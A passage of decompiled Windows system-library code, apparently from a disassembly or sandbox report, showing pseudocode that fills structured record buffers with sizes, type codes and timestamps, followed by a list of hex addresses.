                                                                                                                                                                                                                                                                                                                            								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
                                                                                                                                                                                                                                                                                                                            									goto L92;
                                                                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                                                                            								_t442 =  *(_t474 - 0x11) & _t494[3];
                                                                                                                                                                                                                                                                                                                            								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
                                                                                                                                                                                                                                                                                                                            								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
                                                                                                                                                                                                                                                                                                                            									goto L92;
                                                                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                                                                            								__eflags = _t442 -  *(_t474 - 0x11);
                                                                                                                                                                                                                                                                                                                            								if(_t442 !=  *(_t474 - 0x11)) {
                                                                                                                                                                                                                                                                                                                            									goto L92;
                                                                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                                                                            								L15:
                                                                                                                                                                                                                                                                                                                            								_t306 =  *(_t474 + 1) & 0x000000ff;
                                                                                                                                                                                                                                                                                                                            								 *(_t528 - 0xc0) = _t306;
                                                                                                                                                                                                                                                                                                                            								 *(_t528 - 0xa4) = _t306;
                                                                                                                                                                                                                                                                                                                            								__eflags =  *0x33b60e8;
                                                                                                                                                                                                                                                                                                                            								if( *0x33b60e8 != 0) {
                                                                                                                                                                                                                                                                                                                            									__eflags = _t306 - 0x40;
                                                                                                                                                                                                                                                                                                                            									if(_t306 < 0x40) {
                                                                                                                                                                                                                                                                                                                            										L20:
                                                                                                                                                                                                                                                                                                                            										asm("lock inc dword [eax]");
                                                                                                                                                                                                                                                                                                                            										_t310 =  *0x33b60e8; // 0x0
                                                                                                                                                                                                                                                                                                                            										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
                                                                                                                                                                                                                                                                                                                            										__eflags = _t311 & 0x00000001;
                                                                                                                                                                                                                                                                                                                            										if((_t311 & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                                                                            											 *(_t528 - 0xa0) = _t311;
                                                                                                                                                                                                                                                                                                                            											_t475 = _t427;
                                                                                                                                                                                                                                                                                                                            											 *(_t528 - 0x74) = _t427;
                                                                                                                                                                                                                                                                                                                            											__eflags = _t475;
                                                                                                                                                                                                                                                                                                                            											if(_t475 != 0) {
                                                                                                                                                                                                                                                                                                                            												L91:
                                                                                                                                                                                                                                                                                                                            												_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                                                                                                                                                                                                                                                                                                            												goto L92;
                                                                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                                                                            											asm("sbb edi, edi");
                                                                                                                                                                                                                                                                                                                            											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
                                                                                                                                                                                                                                                                                                                            											_t511 = _t498;
                                                                                                                                                                                                                                                                                                                            											_t312 =  *((intOrPtr*)(_t528 - 0x94));
                                                                                                                                                                                                                                                                                                                            											__eflags =  *(_t312 - 5) & 1;
                                                                                                                                                                                                                                                                                                                            											if(( *(_t312 - 5) & 1) != 0) {
                                                                                                                                                                                                                                                                                                                            												_push(_t528 - 0x98);
                                                                                                                                                                                                                                                                                                                            												_push(0x4c);
                                                                                                                                                                                                                                                                                                                            												_push(_t528 - 0x70);
                                                                                                                                                                                                                                                                                                                            												_push(1);
                                                                                                                                                                                                                                                                                                                            												_push(0xfffffffa);
                                                                                                                                                                                                                                                                                                                            												_t412 = E03309710();
                                                                                                                                                                                                                                                                                                                            												_t475 = _t427;
                                                                                                                                                                                                                                                                                                                            												__eflags = _t412;
                                                                                                                                                                                                                                                                                                                            												if(_t412 >= 0) {
                                                                                                                                                                                                                                                                                                                            													_t414 =  *(_t528 - 0x98) - 8;
                                                                                                                                                                                                                                                                                                                            													 *(_t528 - 0x98) = _t414;
                                                                                                                                                                                                                                                                                                                            													_t416 = _t414 + 0x0000000f & 0x0000fff8;
                                                                                                                                                                                                                                                                                                                            													 *(_t528 - 0x8c) = _t416;
                                                                                                                                                                                                                                                                                                                            													 *(_t528 - 0x79) = 1;
                                                                                                                                                                                                                                                                                                                            													_t511 = (_t416 & 0x0000ffff) + _t498;
                                                                                                                                                                                                                                                                                                                            													__eflags = _t511;
                                                                                                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                                                                            											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
                                                                                                                                                                                                                                                                                                                            											__eflags = _t446 & 0x00000004;
                                                                                                                                                                                                                                                                                                                            											if((_t446 & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                                                                            												__eflags =  *(_t528 - 0x9c);
                                                                                                                                                                                                                                                                                                                            												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E03306DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
                                                                                                                                                                                                                                                                                                                            														_t167 = _t524 + 8; // 0x8
                                                                                                                                                                                                                                                                                                                            														E0330F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
                                                                                                                                                                                                                                                                                                                            														_t529 = _t529 + 0xc;
                                                                                                                                                                                                                                                                                                                            														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                                                                                                                                                                                                                                                                            														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
                                                                                                                                                                                                                                                                                                                            														 *(_t528 - 0x78) = _t479;
                                                                                                                                                                                                                                                                                                                            														_t380 =  *(_t528 - 0x80);
                                                                                                                                                                                                                                                                                                                            														__eflags = _t380;
                                                                                                                                                                                                                                                                                                                            														if(_t380 != 0) {
                                                                                                                                                                                                                                                                                                                            															_t173 = _t380 + 4;
                                                                                                                                                                                                                                                                                                                            															 *_t173 =  *(_t380 + 4) | 1;
                                                                                                                                                                                                                                                                                                                            															__eflags =  *_t173;
                                                                                                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                                                                                                            														_t454 = _t524;
                                                                                                                                                                                                                                                                                                                            														 *(_t528 - 0x80) = _t454;
                                                                                                                                                                                                                                                                                                                            														_t327 = 1;
                                                                                                                                                                                                                                                                                                                            														__eflags = 1;
                                                                                                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                                                                                                            													__eflags =  *(_t528 - 0xd4);
                                                                                                                                                                                                                                                                                                                            													if( *(_t528 - 0xd4) == 0) {
                                                                                                                                                                                                                                                                                                                            														_t505 =  *(_t528 - 0x80);
                                                                                                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                                                                                                            														_t505 = _t479 + _t427;
                                                                                                                                                                                                                                                                                                                            														_t523 = 0x10;
                                                                                                                                                                                                                                                                                                                            														 *_t505 = _t523;
                                                                                                                                                                                                                                                                                                                            														_t367 = 3;
                                                                                                                                                                                                                                                                                                                            														 *((short*)(_t505 + 2)) = _t367;
                                                                                                                                                                                                                                                                                                                            														_t368 = 4;
                                                                                                                                                                                                                                                                                                                            														 *((short*)(_t505 + 6)) = _t368;
                                                                                                                                                                                                                                                                                                                            														 *(_t505 + 4) = 0;
                                                                                                                                                                                                                                                                                                                            														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
                                                                                                                                                                                                                                                                                                                            														_t327 = 1;
                                                                                                                                                                                                                                                                                                                            														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                                                                                                                                                                                                                                                                            														_t479 = _t479 + _t523;
                                                                                                                                                                                                                                                                                                                            														 *(_t528 - 0x78) = _t479;
                                                                                                                                                                                                                                                                                                                            														__eflags = _t454;
                                                                                                                                                                                                                                                                                                                            														if(_t454 != 0) {
                                                                                                                                                                                                                                                                                                                            															_t186 = _t454 + 4;
                                                                                                                                                                                                                                                                                                                            															 *_t186 =  *(_t454 + 4) | 1;
                                                                                                                                                                                                                                                                                                                            															__eflags =  *_t186;
                                                                                                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                                                                                                            														 *(_t528 - 0x80) = _t505;
                                                                                                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                                                                                                            													__eflags =  *(_t528 - 0x7a) - _t327;
                                                                                                                                                                                                                                                                                                                            													if( *(_t528 - 0x7a) == _t327) {
                                                                                                                                                                                                                                                                                                                            														 *(_t528 - 0xd4) = _t479 + _t427;
                                                                                                                                                                                                                                                                                                                            														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
                                                                                                                                                                                                                                                                                                                            														E0330F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
                                                                                                                                                                                                                                                                                                                            														_t529 = _t529 + 0xc;
                                                                                                                                                                                                                                                                                                                            														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                                                                                                                                                                                                                                                                            														_t479 =  *(_t528 - 0x78) + _t522;
                                                                                                                                                                                                                                                                                                                            														 *(_t528 - 0x78) = _t479;
                                                                                                                                                                                                                                                                                                                            														__eflags = _t505;
                                                                                                                                                                                                                                                                                                                            														if(_t505 != 0) {
                                                                                                                                                                                                                                                                                                                            															_t199 = _t505 + 4;
                                                                                                                                                                                                                                                                                                                            															 *_t199 =  *(_t505 + 4) | 1;
                                                                                                                                                                                                                                                                                                                            															__eflags =  *_t199;
                                                                                                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                                                                                                            														_t505 =  *(_t528 - 0xd4);
                                                                                                                                                                                                                                                                                                                            														 *(_t528 - 0x80) = _t505;
                                                                                                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                                                                                                            													__eflags =  *(_t528 - 0xa8);
                                                                                                                                                                                                                                                                                                                            													if( *(_t528 - 0xa8) != 0) {
                                                                                                                                                                                                                                                                                                                            														_t356 = _t479 + _t427;
                                                                                                                                                                                                                                                                                                                            														 *(_t528 - 0xd4) = _t356;
                                                                                                                                                                                                                                                                                                                            														_t462 =  *(_t528 - 0xac);
                                                                                                                                                                                                                                                                                                                            														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
                                                                                                                                                                                                                                                                                                                            														_t485 = 0xc;
                                                                                                                                                                                                                                                                                                                            														 *((short*)(_t356 + 2)) = _t485;
                                                                                                                                                                                                                                                                                                                            														 *(_t356 + 6) = _t462;
                                                                                                                                                                                                                                                                                                                            														 *((short*)(_t356 + 4)) = 0;
                                                                                                                                                                                                                                                                                                                            														_t211 = _t356 + 8; // 0x9
                                                                                                                                                                                                                                                                                                                            														E0330F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
                                                                                                                                                                                                                                                                                                                            														E0330FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
                                                                                                                                                                                                                                                                                                                            														_t529 = _t529 + 0x18;
                                                                                                                                                                                                                                                                                                                            														_t427 =  *(_t528 - 0x88);
                                                                                                                                                                                                                                                                                                                            														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                                                                                                                                                                                                                                                                            														_t505 =  *(_t528 - 0xd4);
                                                                                                                                                                                                                                                                                                                            														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
                                                                                                                                                                                                                                                                                                                            														 *(_t528 - 0x78) = _t479;
                                                                                                                                                                                                                                                                                                                            														_t362 =  *(_t528 - 0x80);
                                                                                                                                                                                                                                                                                                                            														__eflags = _t362;
                                                                                                                                                                                                                                                                                                                            														if(_t362 != 0) {
                                                                                                                                                                                                                                                                                                                            															_t222 = _t362 + 4;
                                                                                                                                                                                                                                                                                                                            															 *_t222 =  *(_t362 + 4) | 1;
                                                                                                                                                                                                                                                                                                                            															__eflags =  *_t222;
                                                                                                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                                                                                                            													__eflags =  *(_t528 - 0xb0);
                                                                                                                                                                                                                                                                                                                            													if( *(_t528 - 0xb0) != 0) {
                                                                                                                                                                                                                                                                                                                            														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
                                                                                                                                                                                                                                                                                                                            														_t458 = 0xb;
                                                                                                                                                                                                                                                                                                                            														 *((short*)(_t479 + _t427 + 2)) = _t458;
                                                                                                                                                                                                                                                                                                                            														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
                                                                                                                                                                                                                                                                                                                            														 *((short*)(_t427 + 4 + _t479)) = 0;
                                                                                                                                                                                                                                                                                                                            														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
                                                                                                                                                                                                                                                                                                                            														E0330FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
                                                                                                                                                                                                                                                                                                                            														_t529 = _t529 + 0xc;
                                                                                                                                                                                                                                                                                                                            														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                                                                                                                                                                                                                                                                            														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
                                                                                                                                                                                                                                                                                                                            														 *(_t528 - 0x78) = _t479;
                                                                                                                                                                                                                                                                                                                            														__eflags = _t505;
                                                                                                                                                                                                                                                                                                                            														if(_t505 != 0) {
                                                                                                                                                                                                                                                                                                                            															_t241 = _t505 + 4;
                                                                                                                                                                                                                                                                                                                            															 *_t241 =  *(_t505 + 4) | 1;
                                                                                                                                                                                                                                                                                                                            															__eflags =  *_t241;
                                                                                                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                                                                                                            													_t328 =  *(_t528 + 0x1c);
                                                                                                                                                                                                                                                                                                                            													__eflags = _t328;
                                                                                                                                                                                                                                                                                                                            													if(_t328 == 0) {
                                                                                                                                                                                                                                                                                                                            														L87:
                                                                                                                                                                                                                                                                                                                            														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
                                                                                                                                                                                                                                                                                                                            														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
                                                                                                                                                                                                                                                                                                                            														_t455 =  *(_t528 - 0xdc);
                                                                                                                                                                                                                                                                                                                            														 *(_t427 + 0x14) = _t455;
                                                                                                                                                                                                                                                                                                                            														_t480 =  *(_t528 - 0xa0);
                                                                                                                                                                                                                                                                                                                            														_t517 = 3;
                                                                                                                                                                                                                                                                                                                            														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
                                                                                                                                                                                                                                                                                                                            														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
                                                                                                                                                                                                                                                                                                                            															asm("rdtsc");
                                                                                                                                                                                                                                                                                                                            															 *(_t427 + 0x3c) = _t480;
                                                                                                                                                                                                                                                                                                                            														} else {
                                                                                                                                                                                                                                                                                                                            															 *(_t427 + 0x3c) = _t455;
                                                                                                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                                                                                                            														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
                                                                                                                                                                                                                                                                                                                            														_t456 =  *[fs:0x18];
                                                                                                                                                                                                                                                                                                                            														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
                                                                                                                                                                                                                                                                                                                            														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
                                                                                                                                                                                                                                                                                                                            														_t427 = 0;
                                                                                                                                                                                                                                                                                                                            														__eflags = 0;
                                                                                                                                                                                                                                                                                                                            														_t511 = 0x18;
                                                                                                                                                                                                                                                                                                                            														goto L91;
                                                                                                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                                                                                                            														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
                                                                                                                                                                                                                                                                                                                            														__eflags = _t519;
                                                                                                                                                                                                                                                                                                                            														 *(_t528 - 0x8c) = _t328;
                                                                                                                                                                                                                                                                                                                            														do {
                                                                                                                                                                                                                                                                                                                            															_t506 =  *((intOrPtr*)(_t519 - 4));
                                                                                                                                                                                                                                                                                                                            															_t457 =  *((intOrPtr*)(_t519 - 0xc));
                                                                                                                                                                                                                                                                                                                            															 *(_t528 - 0xd4) =  *(_t519 - 8);
                                                                                                                                                                                                                                                                                                                            															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
                                                                                                                                                                                                                                                                                                                            															__eflags =  *(_t333 + 0x36) & 0x00004000;
                                                                                                                                                                                                                                                                                                                            															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
                                                                                                                                                                                                                                                                                                                            																_t334 =  *_t519;
                                                                                                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                                                                                                            																_t334 = 0;
                                                                                                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                                                                                                            															_t336 = _t334 & 0x000000ff;
                                                                                                                                                                                                                                                                                                                            															__eflags = _t336;
                                                                                                                                                                                                                                                                                                                            															_t427 =  *(_t528 - 0x88);
                                                                                                                                                                                                                                                                                                                            															if(_t336 == 0) {
                                                                                                                                                                                                                                                                                                                            																_t481 = _t479 + _t506;
                                                                                                                                                                                                                                                                                                                            																__eflags = _t481;
                                                                                                                                                                                                                                                                                                                            																 *(_t528 - 0x78) = _t481;
                                                                                                                                                                                                                                                                                                                            																E0330F3E0(_t479 + _t427, _t457, _t506);
                                                                                                                                                                                                                                                                                                                            																_t529 = _t529 + 0xc;
                                                                                                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                                                                                                            																_t340 = _t336 - 1;
                                                                                                                                                                                                                                                                                                                            																__eflags = _t340;
                                                                                                                                                                                                                                                                                                                            																if(_t340 == 0) {
                                                                                                                                                                                                                                                                                                                            																	E0330F3E0( *(_t528 - 0xb8), _t457, _t506);
                                                                                                                                                                                                                                                                                                                            																	_t529 = _t529 + 0xc;
                                                                                                                                                                                                                                                                                                                            																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
                                                                                                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                                                                                                            																	__eflags = _t340 == 0;
                                                                                                                                                                                                                                                                                                                            																	if(_t340 == 0) {
                                                                                                                                                                                                                                                                                                                            																		__eflags = _t506 - 8;
                                                                                                                                                                                                                                                                                                                            																		if(_t506 == 8) {
                                                                                                                                                                                                                                                                                                                            																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
                                                                                                                                                                                                                                                                                                                            																			 *(_t528 - 0xdc) =  *(_t457 + 4);
                                                                                                                                                                                                                                                                                                                            																		}
                                                                                                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                                                                                                            															_t339 = 0x10;
                                                                                                                                                                                                                                                                                                                            															_t519 = _t519 + _t339;
                                                                                                                                                                                                                                                                                                                            															_t263 = _t528 - 0x8c;
                                                                                                                                                                                                                                                                                                                            															 *_t263 =  *(_t528 - 0x8c) - 1;
                                                                                                                                                                                                                                                                                                                            															__eflags =  *_t263;
                                                                                                                                                                                                                                                                                                                            															_t479 =  *(_t528 - 0x78);
                                                                                                                                                                                                                                                                                                                            														} while ( *_t263 != 0);
                                                                                                                                                                                                                                                                                                                            														goto L87;
                                                                                                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                                                                                                            												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
                                                                                                                                                                                                                                                                                                                            												 *(_t528 - 0xa2) = _t392;
                                                                                                                                                                                                                                                                                                                            												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
                                                                                                                                                                                                                                                                                                                            												__eflags = _t469;
                                                                                                                                                                                                                                                                                                                            												while(1) {
                                                                                                                                                                                                                                                                                                                            													 *(_t528 - 0xe4) = _t511;
                                                                                                                                                                                                                                                                                                                            													__eflags = _t392;
                                                                                                                                                                                                                                                                                                                            													_t393 = _t427;
                                                                                                                                                                                                                                                                                                                            													if(_t392 != 0) {
                                                                                                                                                                                                                                                                                                                            														_t393 =  *((intOrPtr*)(_t469 + 4));
                                                                                                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                                                                                                            													_t395 = (_t393 & 0x000000ff) - _t427;
                                                                                                                                                                                                                                                                                                                            													__eflags = _t395;
                                                                                                                                                                                                                                                                                                                            													if(_t395 == 0) {
                                                                                                                                                                                                                                                                                                                            														_t511 = _t511 +  *_t469;
                                                                                                                                                                                                                                                                                                                            														__eflags = _t511;
                                                                                                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                                                                                                            														_t398 = _t395 - 1;
                                                                                                                                                                                                                                                                                                                            														__eflags = _t398;
                                                                                                                                                                                                                                                                                                                            														if(_t398 == 0) {
                                                                                                                                                                                                                                                                                                                            															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
                                                                                                                                                                                                                                                                                                                            															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
                                                                                                                                                                                                                                                                                                                            														} else {
                                                                                                                                                                                                                                                                                                                            															__eflags = _t398 == 1;
                                                                                                                                                                                                                                                                                                                            															if(_t398 == 1) {
                                                                                                                                                                                                                                                                                                                            																 *(_t528 - 0xa8) =  *(_t469 - 8);
                                                                                                                                                                                                                                                                                                                            																_t402 =  *_t469 & 0x0000ffff;
                                                                                                                                                                                                                                                                                                                            																 *(_t528 - 0xac) = _t402;
                                                                                                                                                                                                                                                                                                                            																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                                                                                                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                                                                                                            													__eflags = _t511 -  *(_t528 - 0xe4);
                                                                                                                                                                                                                                                                                                                            													if(_t511 <  *(_t528 - 0xe4)) {
                                                                                                                                                                                                                                                                                                                            														break;
                                                                                                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                                                                                                            													_t397 =  *(_t528 - 0x88) + 1;
                                                                                                                                                                                                                                                                                                                            													 *(_t528 - 0x88) = _t397;
                                                                                                                                                                                                                                                                                                                            													_t469 = _t469 + 0x10;
                                                                                                                                                                                                                                                                                                                            													__eflags = _t397 -  *(_t528 + 0x1c);
                                                                                                                                                                                                                                                                                                                            													_t392 =  *(_t528 - 0xa2);
                                                                                                                                                                                                                                                                                                                            													if(_t397 <  *(_t528 + 0x1c)) {
                                                                                                                                                                                                                                                                                                                            														continue;
                                                                                                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                                                                                                            													goto L45;
                                                                                                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                                                                                                            												_t475 = 0x216;
                                                                                                                                                                                                                                                                                                                            												 *(_t528 - 0x74) = 0x216;
                                                                                                                                                                                                                                                                                                                            												goto L45;
                                                                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                                                                                                            											asm("lock dec dword [eax+ecx*8+0x4]");
                                                                                                                                                                                                                                                                                                                            											goto L16;
                                                                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                                                                            									_t491 = E03394CAB(_t306, _t528 - 0xa4);
                                                                                                                                                                                                                                                                                                                            									 *(_t528 - 0x74) = _t491;
                                                                                                                                                                                                                                                                                                                            									__eflags = _t491;
                                                                                                                                                                                                                                                                                                                            									if(_t491 != 0) {
                                                                                                                                                                                                                                                                                                                            										goto L91;
                                                                                                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                                                                                                            										_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                                                                                                                                                                                                                                                                                                            										goto L20;
                                                                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                                                                            								L16:
                                                                                                                                                                                                                                                                                                                            								 *(_t528 - 0x74) = 0x1069;
                                                                                                                                                                                                                                                                                                                            								L93:
                                                                                                                                                                                                                                                                                                                            								_t298 =  *(_t528 - 0xd0) + 1;
                                                                                                                                                                                                                                                                                                                            								 *(_t528 - 0xd0) = _t298;
                                                                                                                                                                                                                                                                                                                            								_t474 = _t474 + _t511;
                                                                                                                                                                                                                                                                                                                            								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                                                                                                                                                                                                                                                                                                                            								_t494 = 4;
                                                                                                                                                                                                                                                                                                                            								__eflags = _t298 - _t494;
                                                                                                                                                                                                                                                                                                                            								if(_t298 >= _t494) {
                                                                                                                                                                                                                                                                                                                            									goto L100;
                                                                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                                                                            								_t494 =  *(_t528 - 0xcc);
                                                                                                                                                                                                                                                                                                                            								_t435 = _t298;
                                                                                                                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                                                                            							__eflags = _t494[2] | _t494[3];
                                                                                                                                                                                                                                                                                                                            							if((_t494[2] | _t494[3]) == 0) {
                                                                                                                                                                                                                                                                                                                            								goto L15;
                                                                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                                                                            							goto L12;
                                                                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                                                                            						__eflags = _t301;
                                                                                                                                                                                                                                                                                                                            						if(_t301 != 0) {
                                                                                                                                                                                                                                                                                                                            							goto L92;
                                                                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                                                                            						goto L10;
                                                                                                                                                                                                                                                                                                                            						L92:
                                                                                                                                                                                                                                                                                                                            						goto L93;
                                                                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                                                                            					_push(0x57);
                                                                                                                                                                                                                                                                                                                            					L101:
                                                                                                                                                                                                                                                                                                                            					return E0331D130(_t427, _t494, _t511);
                                                                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                                                                            			}
                                                                                                                                                                                                                                                                                                                            0x03395d86
                                                                                                                                                                                                                                                                                                                            0x03395d95
                                                                                                                                                                                                                                                                                                                            0x03395d98
                                                                                                                                                                                                                                                                                                                            0x03395dba
